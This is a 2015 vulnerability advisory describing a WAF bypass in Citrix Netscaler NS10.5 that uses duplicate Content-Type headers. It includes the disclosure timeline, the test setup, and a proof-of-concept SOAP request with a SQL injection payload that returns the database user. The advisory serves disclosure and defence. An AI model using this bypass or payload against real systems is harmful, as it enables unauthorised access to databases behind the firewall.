Document Title: ============ Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution Release Date: =========== 12 Mar 2015 Product & Service Introduction: ======================== Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications. Abstract Advisory Information: ======================= BGA Security Team discovered an HTTP Header Pollution vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable) Vulnerability Disclosure Timeline: ========================= 2 Feb 2015 Bug reported to the vendor. 4 Feb 2015 Vendor returned with a case ID. 5 Feb 2015 Detailed info/config given. 12 Feb 2015 Asked about the case. 16 Feb 2015 Vendor returned "investigating ..." 6 Mar 2015 Asked about the case. 6 Mar 2015 Vendor has validated the issue. 12 Mar 2015 There aren't any fix addressing the issue. Discovery Status: ============= Published Affected Product(s): =============== Citrix Systems, Inc. Product: Citrix Netscaler NS10.5 (other versions may be vulnerable) Exploitation Technique: ================== Remote, Unauthenticated Severity Level: =========== High Technical Details & Description: ======================== It is possible to bypass Netscaler WAF using a method which may be called HTTP Header Pollution. The setup: An Apache web server with default configuration on Windows (XAMPP). A SOAP web service which has written in PHP and vulnerable to SQL injection. Netscaler WAF with SQL injection rules. First request: union select current_user,2# - Netscaler blocks it. Second request: The same content and an additional HTTP header which is Content-Type: application/octet-stream. - It bypasses the WAF but the web server misinterprets it. Third request: The same content and two additional HTTP headers which are Content-Type: application/octet-stream and Content-Type: text/xml in that order. The request is able to bypass the WAF and the web server runs it. Proof of Concept (PoC): ================== Proof of Concept Request: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> <soapenv:Header/> <soapenv:Body> <string>' union select current_user, 2#</string> </soapenv:Body> </soapenv:Envelope> Response: <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <return xsi:type='xsd:string'> Name: root@localhost </return> </soap:Body> </soap:Envelope> Solution Fix & Patch: ================ 12 Mar 2015 There aren't any fix addressing the issue. Security Risk: ========== The risk of the vulnerability above estimated as high. Credits & Authors: ============== BGA Bilgi Gvenli&#240;i - Onur ALANBEL Disclaimer & Information: =================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain: www.bga.com.tr Social: twitter.com/bgasecurity Contact: bilgi@bga.com.tr Copyright &#169; 2015 | BGA